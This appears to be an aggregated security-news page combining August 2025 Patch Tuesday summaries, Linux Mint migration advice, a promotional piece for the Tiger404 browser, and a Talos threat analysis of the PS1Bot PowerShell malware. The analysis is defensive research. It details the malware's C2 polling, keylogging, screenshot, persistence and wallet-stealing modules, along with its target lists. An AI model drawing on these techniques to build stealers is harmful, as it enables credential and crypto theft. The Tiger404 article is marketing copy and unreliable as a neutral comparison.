Microsoft today released updates to fix more than 100 security flaws in its Windows operating systems and other software. At least 13 of the bugs received Microsoft’s most-dire “critical” rating, meaning they could be abused by malware or malcontents to gain remote access to a Windows system with little or no help from users.
August’s patch batch from Redmond includes an update for CVE-2025-53786, a vulnerability that allows an attacker to pivot from a compromised Microsoft Exchange Server directly into an organization’s cloud environment, potentially gaining control over Exchange Online and other connected Microsoft Office 365 services. Microsoft first warned about this bug on Aug. 6, saying it affects Exchange Server 2016 and Exchange Server 2019, as well as its flagship Exchange Server Subscription Edition.
Ben McCarthy, lead cyber security engineer at Immersive, said a rough search reveals approximately 29,000 Exchange servers publicly facing on the internet that are vulnerable to this issue, with many of them likely to have even older vulnerabilities.
McCarthy said the fix for CVE-2025-53786 requires more than just installing a patch, such as following Microsoft’s manual instructions for creating a dedicated service to oversee and lock down the hybrid connection.
“In effect, this vulnerability turns a significant on-premise Exchange breach into a full-blown, difficult-to-detect cloud compromise with effectively living off the land techniques which are always harder to detect for defensive teams,” McCarthy said.
CVE-2025-53779 is a weakness in the Windows Kerberos authentication system that allows an unauthenticated attacker to gain domain administrator privileges. Microsoft credits the discovery of the flaw to Akamai researcher Yuval Gordon, who dubbed it “BadSuccessor” in a May 2025 blog post. The attack exploits a weakness in “delegated Managed Service Account” or dMSA — a feature that was introduced in Windows Server 2025.
Some of the critical flaws addressed this month with the highest severity (between 9.0 and 9.9 CVSS scores) include a remote code execution bug in the Windows GDI+ component that handles graphics rendering (CVE-2025-53766) and CVE-2025-50165, another graphics rendering weakness. Another critical patch involves CVE-2025-53733, a vulnerability in Microsoft Word that can be exploited without user interaction and triggered through the Preview Pane.
One final critical bug tackled this month deserves attention: CVE-2025-53778, a bug in Windows NTLM, a core function of how Windows systems handle network authentication. According to Microsoft, the flaw could allow an attacker with low-level network access and basic user privileges to exploit NTLM and elevate to SYSTEM-level access — the highest level of privilege in Windows. Microsoft rates the exploitation of this bug as “more likely,” although there is no evidence the vulnerability is being exploited at the moment.
Feel free to holler in the comments if you experience problems installing any of these updates. As ever, the SANS Internet Storm Center has its useful breakdown of the Microsoft patches indexed by severity and CVSS score, and AskWoody.com is keeping an eye out for Windows patches that may cause problems for enterprises and end users.
GOOD MIGRATIONS
Windows 10 users out there likely have noticed by now that Microsoft really wants you to upgrade to Windows 11. The reason is that after the Patch Tuesday on October 14, 2025, Microsoft will stop shipping free security updates for Windows 10 computers. The trouble is, many PCs running Windows 10 do not meet the hardware specifications required to install Windows 11 (or they do, but just barely).
If the experience with Windows XP is any indicator, many of these older computers will wind up in landfills or else will be left running in an unpatched state. But if your Windows 10 PC doesn’t have the hardware chops to run Windows 11 and you’d still like to get some use out of it safely, consider installing a newbie-friendly version of Linux, like Linux Mint.
Like most modern Linux versions, Mint will run on anything with a 64-bit CPU that has at least 2GB of memory, although 4GB is recommended. In other words, it will run on almost any computer produced in the last decade.
There are many versions of Linux available, but Linux Mint is likely to be the most intuitive interface for regular Windows users, and it is largely configurable without any fuss at the text-only command-line prompt. Mint and other flavors of Linux come with LibreOffice, which is an open source suite of tools that includes applications similar to Microsoft Office, and it can open, edit and save documents as Microsoft Office files.
If you’d prefer to give Linux a test drive before installing it on a Windows PC, you can always just download it to a removable USB drive. From there, reboot the computer (with the removable drive plugged in) and select the option at startup to run the operating system from the external USB drive. If you don’t see an option for that after restarting, try restarting again and hitting the F8 button, which should open a list of bootable drives. Here’s a fairly thorough tutorial that walks through exactly how to do all this.
And if this is your first time trying out Linux, relax and have fun: The nice thing about a “live” version of Linux (as it’s called when the operating system is run from a removable drive such as a CD or a USB stick) is that none of your changes persist after a reboot. Even if you somehow manage to break something, a restart will return the system back to its original state.
Officials are reportedly blaming a recent breach of the U.S. federal court’s filing system on Russia, whose hackers used the access to snoop on midlevel criminal cases in the New York City area and other jurisdictions.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-12 21:07:022025-08-12 21:07:02Russian government hackers said to be behind US federal court filing system hack: Report
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-12 21:07:022025-08-12 21:07:02Reddit blocks the Internet Archive from crawling its data – here’s why
Connex Credit Union breach exposes data of 172000 members, legal probe launched, experts urge victims to monitor accounts…
Hackread – Latest Cybersecurity, Hacking News, Tech, AI & Crypto – Read More
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-12 20:06:502025-08-12 20:06:50Connex Credit Union Data Breach Affects 172,000 Members
The need for online anonymity has never been greater. As surveillance capabilities grow more sophisticated and data collection becomes ubiquitous, users are turning to anonymous browsers to protect their privacy. Traditional browsers like Firefox and Brave offer privacy modes and tracker blocking, while browsers such as Tor provide anonymity through onion routing. However, the landscape of anonymous browsers is nuanced, and choosing the right tool requires a careful understanding of their trade-offs and technical capabilities.
Tor Browser remains the benchmark for network anonymity, routing traffic through multiple volunteer nodes to obscure user location and activity. This approach provides strong defenses against network-level surveillance and censorship. However, Tor’s latency and compatibility challenges make it less practical as a daily driver for most users. Its strict design and slower speeds can impede usability, limiting its appeal to activists, security researchers, and those with specific anonymity needs rather than everyday privacy-focused internet users.
Mainstream privacy browsers like Brave improve on traditional privacy features by blocking trackers and third-party cookies, but they operate within legal jurisdictions that can impose data collection demands and surveillance. Brave’s business model, tied to advertising and cryptocurrency rewards, means that users remain participants in a commodified attention economy, limiting the level of true anonymity and directly linking the user to their browsing activity.
Other privacy-focused browsers, such as Mullvad, offer a streamlined experience with robust privacy defaults but largely rely on standard network connections and local software installation, without advanced compartmentalization or decentralized infrastructure. Firefox, while open source and configurable, does not natively provide multi-layered session isolation or the ability to customize network routing on a per-tab basis.
Then there is Tiger404, which presents a fundamentally different architecture designed for digital sovereignty and operational anonymity. It combines the compatibility and performance advantages of a Chromium-based browser engine with advanced features like disposable, physically isolated anonymous browser containers and granular network isolation. Each session operates as a sandboxed container with unique fingerprints and distinct proxy or multi-hop routing configurations, preventing cross-session correlation and making fingerprinting significantly more difficult, and browsing the internet anonymously a reality.
Moreover, Tiger404’s cloud-native architecture offers a significant security advantage through physical isolation and airgapping of the browsing environment. Unlike traditional browsers installed directly on a user’s device—which can leave behind residual data, cached files, and system-level artifacts that can be exploited or traced—Tiger404 runs sessions in isolated containers hosted remotely. This approach effectively “airgaps” the browser from the local machine, so that browsing activities do not interact with the device’s operating system or storage.
This physical separation dramatically reduces the risk of data leakage or compromise through malware, keyloggers, or forensic analysis of local storage. It also mitigates threats stemming from compromised devices or insider attacks, since sensitive browsing data never touches the user’s hardware. Users gain the ability to close a session and erase all traces instantly, with no lingering footprints left behind on their computers or mobile devices.
In contrast, locally installed browsers—even those with strong privacy settings—are vulnerable to leaving behind identifiable artifacts such as cookies, browsing history, cached files, or browser fingerprints that can be collected or analyzed. Furthermore, local installations are subject to OS-level compromises, making it easier for attackers or surveillance actors to monitor activity or extract data.
By separating the browsing environment from the endpoint device, Tiger404 provides an operational security model closer to airgapped systems used in high-security environments. This approach not only protects user anonymity but also elevates overall system security, enabling safer anonymous browsing without sacrificing accessibility or convenience.
Tiger404’s isolated browsing sessions make managing multiple social accounts more straightforward and secure. By compartmentalizing each identity within its own sandboxed container, users can easily keep profiles separate without risk of cross-contamination or linkage, simplifying account management while preserving anonymity.
While no anonymous browser is a silver bullet, Tiger404 addresses many of the limitations found in both mainstream and specialized options by balancing usability, operational security, and network-level anonymity. It provides a practical solution for users who require strong, consistent anonymity without sacrificing everyday functionality.
In conclusion, navigating the landscape of anonymous browsers requires a clear understanding of their inherent trade-offs. While Tor delivers unparalleled network anonymity, its practical limitations often restrict everyday use. Mainstream browsers prioritize convenience but cannot guarantee full anonymity due to inherent design and jurisdictional constraints. Tiger404 sets a new standard by embracing a sovereignty-first philosophy, combining robust anonymity with seamless usability. It empowers users to reclaim control over their digital footprint without compromise, offering a powerful, adaptable solution for those who demand true online privacy in today’s complex digital environment.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-12 20:06:492025-08-12 20:06:49Rethinking Anonymity: Why Privacy Browsers Fall Short
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-12 20:06:492025-08-12 20:06:49This Bluetooth tracker’s latest feature could save your life – but it costs extra
Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as “critical”.
In this month’s release, Microsoft observed none of the included vulnerabilities being actively exploited in the wild. Out of 13 “critical” entries, 9 are remote code execution (RCE) vulnerabilities in Microsoft Windows services and applications including the Windows kernel, Microsoft Message Queuing (MSMQ), Windows Hyper-V, Microsoft Office and GDI+.
CVE-2025-50176 is an RCE vulnerability in DirectX Graphics Kernel given a CVSS 3.1 score of 7.8, where access of resource using incompatible type (‘type confusion’) in Graphics Kernel allows an authorized attacker to execute code locally. Microsoft has noted that this vulnerability affects different versions of Windows 11, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “more likely”.
CVE-2025-50177 is an RCE vulnerability in Microsoft Message Queuing (MSMQ) service, given a CVSS score of 8.1, where use after free vulnerability allows an unauthorized attacker to execute code over a network. To exploit this vulnerability, an attacker would need to send a series of specially crafted MSMQ packets in arapid sequence over HTTP to a MSMQ server. Microsoft assessed that the attack complexity is “high”, and that exploitation is “more likely”.
CVE-2025-53778 is a Windows NTLM elevation of privilege vulnerability given a CVSS 3.1 base score of 8.8, where improper authentication in Windows NTLM allows an authorized attacker to elevate privileges over a network, with an attacker successfully exploiting this vulnerability gaining SYSTEM privileges. Microsoft has noted that this vulnerability affects different versions of Windows 10, Windows 11, Windows server 2008, Windows Server 2012, Windows Server 2026, Windows Server 2019, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “more likely”.
CVE-2025-53781 is an information disclosure vulnerability in Windows Hyper-V given a CVSS 3.1 base score of 7.7, where an authorized attacker may be able to disclose sensitive information over a network. Microsoft has noted that this vulnerability affects Windows Server 2025 with the attack complexity assessed as “low” and that exploitation as “less likely”.
CVE-2025-53733 is a remote code execution vulnerability in Microsoft Word given a CVSS 3.1 base score of 8.4 where an incorrect conversion between numeric types in Microsoft Office Word allows an unauthorized attacker to execute code locally. Microsoft has noted that this vulnerability affects Word 2016, Microsoft SharePoint Server 2019, Microsoft SharePoint Enterprise Server 2016, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-53740 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4 where a use after free condition allows an unauthorized attacker to execute code locally using a Preview Pane as the attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019, Microsoft Office LTSC 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-53766 is a remote code execution vulnerability in GDI+, a graphics Windows subsystem providing a set of features for rendering 2D graphics, images, and text, given a CVSS 3.1 base score of 9.8 where a heap-based buffer overflow allows an unauthorized attacker to execute code over a network. An attacker could trigger this vulnerability by convincing a victim to download and open a document that contains a specially crafted metafile. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server 2008. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-50165 is another remote code execution vulnerability in the Windows graphics component. It was also given a CVSS 3.1 base score of 9.8 where an untrusted pointer dereference allows an unauthorized attacker to execute code over a network without any user intervention. An attacker can use an uninitialized function pointer being called when decoding a JPEG image. This can be embedded in Office and 3rd party documents/files. This vulnerability affects Windows 11 24H2 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-49707 is a spoofing vulnerability in Windows Hyper-V hypervisor affecting Azure, given a CVSS 3.1 base score of 7.9, where improper access control may allow an attacker to perform spoofing locally. To exploit this vulnerability, an attacker could obtain a valid certificate after a system reboot, which could then be used to access sensitive information, bypassing security measures and allow an attacker with access to a confidential VM to impersonate its identity in communications with external systems. Microsoft has noted that this vulnerability affects NCCadsH100v5-series, ECesv5-series, ECedsv5-series, ECasv5-series, ECadsv5-series, DCesv5-series, DCedsv5-series, DCasv5-series and DCadsv5-series of Azure VM. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.
CVE-2025-48807 is a remote code execution vulnerability in Windows Hyper-V hypervisor, given a CVSS 3.1 base score of 7.5, where improper restriction of communication channels to intended endpoints may result in an attacker executing code locally in a nested guest VM to escape their VM and gain admin privileges on the guest VM that is serving as the host. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server VM. Microsoft assessed that the attack complexity is “high”, and that exploitation is “less likely”.
CVE-2025-53731 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office 2019, Microsoft Office 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
CVE-2025-53784 is a remote code execution vulnerability affecting Microsoft Word, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
CVE-2025-53793 is an information disclosure vulnerability in Microsoft Azure Stack Hub, which may allow an attacker to disclose system internal configuration information over the network. It was given a CVSS 3.1 base score of 7.5 and affects Azure Stack Hub 2501, Azure Stack Hub 2406 and Azure Stack Hub 2408. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”.
Aside from the vulnerabilities patched and disclosed in the regular monthly patch release for August, it is worth noting that one week ahead of the monthly update, Microsoft disclosed 4 vulnerabilities affecting Microsoft cloud services, CVE-2025-53767, CVE-2025-53774, CVE-2025-53787 and CVE-2025-53792. While the CVSS base score for some of them is high, Microsoft has noted that no customer actions are required to resolve the issues.
Talos would also like to highlight the following “important” vulnerabilities as Microsoft has determined that their exploitation is “more likely:”
CVE-2025-53786: Microsoft Exchange Server Hybrid Deployment Elevation of Privilege Vulnerability
CVE-2025-49743: Windows Graphics Component Elevation of Privilege Vulnerability,
CVE-2025-50167: Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2025-50168: Win32k Elevation of Privilege Vulnerability
CVE-2025-53132: Win32k Elevation of Privilege Vulnerability
CVE-2025-53147: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
CVE-2025-53156: Windows Storage Port Driver Information Disclosure Vulnerability
CVE-2025-49712: Microsoft SharePoint Remote Code Execution Vulnerability
A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.
In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are: 65234- 65237, 65240-65247.
The following Snort 3 rules are also available: 301300, 301301, 30304-30306, 65240, 65241.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-08-12 20:06:412025-08-12 20:06:41Microsoft Patch Tuesday for August 2025 — Snort rules and prominent vulnerabilities
Cisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage malware framework, implemented in PowerShell and C#, which we are referring to as “PS1Bot.”
PS1Bot features a modular design, with several modules delivered used to perform a variety of malicious activities on infected systems, including information theft, keylogging, reconnaissance and the establishment of persistent system access.
PS1Bot has been designed with stealth in mind, minimizing persistent artifacts left on infected systems and incorporating in-memory execution techniques to facilitate execution of follow-on modules without requiring them to be written to disk.
PS1Bot distribution campaigns have been extremely active since early 2025, with new samples being observed frequently throughout the year.
The information stealer module implementation leverages wordlists embedded into the stealer to enumerate files containing passwords and seed phrases that can be used to access cryptocurrency wallets, which the stealer also attempts to exfiltrate from infected systems.
Campaign Overview
Cisco Talos has been monitoring an ongoing malware campaign that has been active throughout 2025. The campaign appears to be leveraging malvertising to direct victims to a multi-stage malware framework, implemented in PowerShell and C#, that possesses robust functionality, including the ability to deliver follow-on modules including an information stealer, keylogger, screen capture collector and more. It also establishes persistence to continue operations following system reboots. The design of this malware framework appears to attempt to minimize artifacts left on infected systems by facilitating the delivery and execution of modules in-memory, without requiring them to be written to disk. Due to similarities in the design and implementation with the malware family AHK Bot, we are referring to this PowerShell-based malware as “PS1Bot.”
This campaign has been extremely active, with new samples being observed continuously over the past several months. The cluster of malicious activity associated with this campaign also overlaps with prior reporting, including reporting on Skitnet. While Talos has not observed delivery of the Skitnet binary in any of the infection chains we analyzed, the PowerShell implementation described in that reporting appears to match the components delivered throughout the infection chain in this case as well. We have also observed significant overlap in the C2 infrastructure used in both cases. Likewise, we have observed code and indicator overlap with previously reported malvertising campaigns.
Delivery
The victim is initially delivered a compressed archive. The file names Talos observed in the wild are consistent with what is typically seen during search engine optimization (SEO) poisoning and/or malvertising campaigns, where the file name matches the keyword phrase being targeted in the campaigns:
chapter 8 medicare benefit policy manual.zip
Counting Canadian Money Worksheets Pdf.zip.e49
zebra gx430t manual.zip.081
kosher food list pdf (1).zip.c9a
pambu panchangam 2024-25 pdf.zip.a7a
Prior reporting on social media further strengthens this assessment, where researchers have observed the malvertising campaigns leading to the compressed archives delivered in this campaign.
Inside of the compressed archive is a single file called “FULL DOCUMENT.js” that functions as a downloader, retrieving the next stage of the infection. In the cases analyzed, the JS file contained VBScript, which employed a variety of obfuscation methods throughout 2025. Below is an example of one of the more simplistic examples observed recently.
Figure 1. Deobfuscating the downloader script.
Stage 1 retrieval
When executed, the malware retrieves a JScript scriptlet from an attacker controlled server, the contents of which are then executed.
Figure 2. Example JScript scriptlet contents.
This script is responsible for performing the environmental setup needed for subsequent malware operations to function properly. This includes writing a PowerShell script to C:ProgramData (ntu.ps1 in this case) and executing the script contents written to the file created in the previous step and redacted for space in the previous screenshot. This PowerShell script obtains the serial number of the C: drive and uses it to construct a URL, which it uses to attempt to establish a connection to the command and control (C2) server to retrieve additional malicious content to execute. Any PowerShell content received is then passed to Invoke-Expression (IEX) and executed within the existing PowerShell process. This is repeated in a loop with Sleep() delays added between each iteration.
Figure 3. PowerShell module retrieval and C2 polling.
This allows the malware to continue to run, periodically attempting to poll the attacker’s C2 server to retrieve additional commands to execute within the PowerShell process running on the system. We have observed this technique used to deliver a variety of additional modules, each enabling the attacker to conduct additional operations on the system, obtain additional environmental information about systems under their control, and enable the theft of sensitive information such as credentials, session tokens and financial account details (cryptocurrency wallet data).
PowerShell modules
We have observed the delivery of the following types of PowerShell modules during and after the initial infection process. Each module is responsible for carrying out its respective task, and several rely on delivery of C# classes that are dynamically compiled to generate assembly DLLs and executed to assist with collection of survey information, keylogging, and screenshot capture.
Antivirus detection
Screen capture
Wallet grabber
Keylogger
Information collection
Persistence
In most of the modules analyzed, logging functionality has been built in to allow the attacker to monitor the installation and runtime status during and post-deployment. In most cases, these status updates are delivered to the C2 server in the form of URL parameters that are included as part of HTTP GET requests to the URL used to establish an initial C2 connection.
We assess with high confidence that additional modules likely exist and are deployable as desired by the adversary. The modular nature of the implementation of this malware provides flexibility and enables the rapid deployment of updates or new functionality as needed. While analyzing activity associated with PS1Bot throughout 2025, we have observed development activities occurring over time, indicating that this is a rapidly evolving threat.
Antivirus detection
This PowerShell module is delivered after initial C2 establishment and is responsible for obtaining and reporting the antivirus programs present on the infected system. This is accomplished by querying Windows Management Instrumentation (WMI) to obtain a list of installed antivirus products.
Figure 4. Antivirus detection logic.
The returned product list is then transmitted to the attacker via an HTTP GET request containing the results of the operation as URL parameters.
Figure 5. Status logging implementation.
The following is an example of the URL structure used to transmit the information to the C2 server:
Once this is completed, execution is passed back to the main PowerShell script and C2 beaconing continues until additional instructions are received. In several cases, we have observed the delivery of several distinct PowerShell scripts during the infection process. To facilitate delivery of new PowerShell scripts, we have observed that the attacker simply manipulates the response content associated with the C2 URL derived initially. Each time the infected system beacons to the C2 server, any delivered PowerShell is dynamically passed to IEX and executed.
Screen capture
Once antivirus detection has been performed, we have observed the delivery of additional PowerShell modules, one of which is used to capture screenshots on infected systems and transmit the resulting images to the C2 server. This is often performed for a variety of reasons, including to identify when systems may be in active use by victims versus unattended or to collect sensitive information that may be displayed on screen but not otherwise recorded for easy exfiltration.
In this case, the adversary is using PowerShell to dynamically compile and execute a C# assembly DLL at runtime.
Figure 6. Example use of Add-Type for C# compilation.
The resulting DLL is then used to capture the screenshot and create a Bitmap image (.BMP) inside of the %TEMP% directory. The image is later converted and stored as a JPEG at %APPDATA%Screenshot.jpg.
Figure 7. Screenshot generation logic.
The content stored within the image file is then Base64 encoded and the resulting data is then transmitted to C2. The image files in both %TEMP% and %APPDATA% are also deleted.
Figure 8. Example HTTP POST containing Base64 encoded screenshot image file.
Additionally, status logging messages are sent to inform the attacker of the module’s progress, an example of which is shown below.
Following successful collection of screenshots on infected systems, we have observed the delivery of an additional PowerShell module that the attacker refers to as the “grabber module” that is used to steal sensitive data from infected systems. It is designed to target the following types of data that are then exfiltrated to the C2 server:
Local browser storage (stored credentials, cookies, etc.)
Browser extension data for cryptocurrency-related extensions like wallets
Local application data for cryptocurrency wallet applications
Files containing passwords, sensitive strings or wallet seed phrases
The module begins by checking the values of variables that were declared in earlier stages of the infection process. If the script is not being executed within the context of the PowerShell process established earlier, it will fail and terminate execution.
Next, it begins transmitting status logging messages to the C2 server via HTTP GET requests to inform the attacker that the grabber module is running and to provide basic runtime information. Log messages are periodically transmitted during the execution of this module to provide ongoing status updates, error alerting and other relevant information throughout the execution process.
The malware first checks for the existence of various installed applications of interest, including browsers, browser extensions and cryptocurrency wallet applications. If found, the application data is copied to %TEMP% for staging.
The malware specifically checks for the existence of application data associated with the following web browsers:
Google Chrome
Chromium
Kometa
Microsoft Edge
7Star
Maxthon
Opera
Atom
Mustang
Opera GFX
AVG Secure Browser
Netbox Browser
Brave
Avast Secure Browser
Orbitum
Vivaldi
CCleaner Browser
QQ Browser
Yandex
Chedot
SalamWeb
Slimjet
Chrome Beta
Sidekick
Epic Privacy Browser
Chrome Canary
Sleipnir
Comodo Dragon
Citrio
Sputnik
CentBrowser
CoolNovo
Superbird
Naver Whale
Coowon
Swing Browser
SRWare Iron
CryptoTab Browser
Tempest
Blisk
Elements Browser
UC Browser
Torch
Iridium
Ulaa
Coc Coc
Kinza
UR Browser
Amigo
Wavebo
Viasat Browser
In addition to the previously listed browsers, the information stealer also checks for the installation of the following Chromium extensions, most of which are associated with cryptocurrency wallets and multi-factor authentication (MFA) authenticators:
MetaMask
Trezor
wallet-guard-protect-your
MetaMask-edge
Ledger
subwallet-polkadot-wallet
MetaMask-Opera
Mycelium
argent-x-starknet-wallet
Trust-Wallet
TrustWallet
bitget-wallet-formerly-bi
Atomic-Wallet
Ellipal
core-crypto-wallet-nft-ex
Binance
Dapper
braavos-starknet-wallet
Phantom
BitKeep
Kepler
Coinbase
Argent
martian-aptos-sui-wallet
Ronin
Blockchain Wallet
xverse-wallet
Exodus
cryptocom-wallet-extension
gate-wallet
Coin98
Zerion
sender-wallet
KardiaChain
Aave
desig-wallet
TerraStation
Curve
fewcha-move-wallet
Wombat
SushiSwap
kepler-edge
Harmoney
Uniswap
okx-wallet
Nami
1inch
unisat-wallet
MartianAptos
petra-aptos-wallet
xdefi-wallet
Braavos
manta-wallet
rose-wallet
XDEFI
TON
Authenticator
Yoroi
Tron
If discovered, associated extension data is staged using a process similar to that described earlier for web browser application data. The information stealer also attempts to locate locally installed cryptocurrency wallet applications and MFA applications, including the following:
Authy Desktop
Atomic
Armory
Exodus
Electrum
Bytecoin
Coinomi
Daedalus
Ethereum
Bitcoin Core
Ledger Live
Guarda
Binance
Zcash
TrustWallet
One interesting piece of functionality included with the information stealer is a scanner that is designed to identify and exfiltrate files containing sensitive information. The script contains a large wordlist of English words. We have also observed variants of the grabber module that contain wordlists targeting other languages, such as Czech. Additionally, we have observed versions that contain multiple wordlists targeting different cryptocurrency wallet seed phrase combinations.
Figure 9. Wallet seed phrase wordlist.
This wordlist is designed to be used to identify files that may contain cryptocurrency wallet seed phrases, which can be used to regain access to wallets in the case that the primary authentication method is unavailable. This is performed by iterating through the file system on local hard drives, identifying files matching specific file extensions and file sizes, and then scanning them for the presence of multiple string values matching the wordlist.
Figure 10. File scanning parameters.
It also attempts to identify files that may contain passwords.
Figure 11. Password file detection criteria.
Once the sensitive information has been collected, it is then compressed and exfiltrated to the attacker’s C2 server.
Figure 12. Compressed archive exfiltration logic.
Data compression and exfiltration is performed via an HTTP POST request, as shown in Figure 13.
Figure 13. Example HTTP POST containing compressed archive.
Any discovered wallet seed phrases are communicated to the attacker using HTTP GET requests, using a format similar to the one in Figure 14.
Figure 14. Transmission of detected wallet seed phrase contents.
This demonstrates a robust information stealer that, in this case, has been implemented as a PowerShell module.
Keylogger
The keylogging and clipboard capture module is implemented similarly to the screen capture module described earlier, with PowerShell being used to dynamically compile and execute a C# assembly DLL at runtime.
Figure 15. Example use of Add-Type in PowerShell.
The keylogger uses SetWindowsHookEx() to monitor keyboard and mouse events to facilitate the capture of keystrokes and mouse activity on the system.
Figure 16. Example SetWindowsHookEx() logic.
Clipboard contents are also monitored so that information copied can be dynamically logged as well. As with other modules, status logging has been implemented and is performed via HTTP GET requests, an example of which is:
The module also relays this status in the body of an HTTP POST request.
Figure 17. Status logging transmission to C2.
Collected data is transmitted to the attacker via HTTP POST requests similar to Figure 18.
Figure 18. Keystroke log transmission.
Information collection
We have also observed the delivery of a system survey module that the attacker refers to as “WMIComputerCSHARP” that is used to collect and transmit information about the infected system and environment to the attacker. Consistent with the design of the screenshot and keylogging modules, this module is implemented using a combination of PowerShell and C# and features the use of runtime compilation.
The module uses WMI to query the domain membership information of the infected system, likely to enable the attacker to perform reconnaissance to determine if they were successful in gaining access to a high value target.
Figure 19. Survey collection status logging message.
The following WMI queries are performed as part of this process:
SELECT Domain, PartOfDomain FROM Win32_ComputerSystem
SELECT DomainName FROM Win32_NTDomain WHERE ClientSiteName IS NOT NULL
In addition, the %USERDNSDOMAIN% environment variable is also queried to attempt to enumerate the domain membership of the infected system. The collected information is transmitted to the attacker’s C2 server, consistent with what was described for other modules.
Figure 20. Example status logging implementation.
Persistence
We have also observed the delivery of a persistence module that can be used as desired to ensure that the main looping mechanism is re-executed following a system restart or user session termination. This allows for the reestablishment of a C2 communications channel and enables the delivery of additional modules as desired by the adversary.
The module begins by attempting to create a PowerShell script that will be executed each time the system restarts. The module creates a randomly generated directory within the %PROGRAMDATA% directory that will be used to store the components needed for persistence. These include a randomly-named PowerShell script (PS1) as well as a randomly-named shortcut file (ICO). A malicious randomly-named LNK file is also created in the Startup directory that is configured to point to the PowerShell script previously created so that it can be executed each time the system is rebooted.
The ICO file is created using base64-encoded content delivered as part of the module itself. The PowerShell script contents are generated by retrieving an obfuscated blob from the C2 server, which in our sample was hosted at the URL path /transform.
Figure 22. Persistence payload retrieval.
A simulated example of this process is shown in Figure 23.
Figure 23. Simulated delivery of obfuscated persistence payload.
This content is then written to the PS1 file and the LNK file is generated with the appropriate parameters to enable execution in the future. When deobfuscated, the contents of the PowerShell simply contain the same logic used to establish the C2 polling process previously described early in the infection chain.
Figure 24. Deobfuscated persistence payload.
We assess with high confidence that there are likely additional modules available for deployment as-needed by the adversary and the use of this framework provides a flexible means to enhance and increase the functionality available rapidly as needed.
Links to previous intrusion activity
During our analysis of the code and functionality associated with this infection chain, we observed similarities with components referenced in prior reporting related to the use of Skitnet/Bossnet to deliver PowerShell modules to infected systems. We have also observed multiple overlaps in the C2 infrastructure used in this campaign and the one described by the aforementioned reporting. Additionally, we assess with high confidence that the final deobfuscated payload dropped by the persistence module previously described was likely created by the same entity who created the PowerShell script described in the prior reporting. The overall implementation, use of specific variables throughout the code, and matching C2 URL construction strengthen this assessment. Below is a comparison of the code in both instances.
Figure 25. Comparison of persistence payload (left) vs. ProDaft reporting (right).
As observable in Figure 25, the only difference between the two samples is the addition of mutex handling and sleep periods.
While Talos did not identify any direct overlap in activity related to these malware families, we noted similarities in the design architecture and functionality provided by the PS1Bot malware delivered in this case and that present in another malware family Talos previously reported on called AHK Bot. The derivation of the C2 URL path based on the drive serial number is consistent across both malware families. Likewise, the use of a main polling script and subsequent delivery and execution of purpose-built modules is also similar to the design architecture found with AHK Bot. There are also several similarities in the types of modules available for both malware families. Heavy use of URL parameters when communicating with C2 is another similarity between the two families.
Coverage
Ways our customers can detect and block this threat are listed below.
